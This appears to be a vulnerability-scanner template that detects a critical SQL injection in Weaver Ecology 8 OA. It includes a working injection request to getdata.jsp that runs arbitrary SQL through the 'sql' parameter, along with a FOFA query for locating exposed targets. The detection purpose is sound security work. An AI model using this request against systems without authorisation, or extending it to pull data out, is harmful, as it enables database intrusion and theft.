id: ecology-v8-sqli

info:
  name: Ecology 8 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: Ecology 8 contains a SQL injection vulnerability via a GET request. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
    fofa-query: app="泛微-协同办公OA"
  tags: ecology,sqli

http:
  - method: GET
    path:
      - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "474088963122"

      - type: status
        status:
          - 200
# digest: 490a00463044022079724880fc21c370205bde26f40402432f8f5fb4d988e230039d074204ddfda902207a882ccb2a295732dfef393d7fa55d0033c69545e2ebd30e2a0a2da73b9eb80a:922c64590222798bb761d5b6d8e72950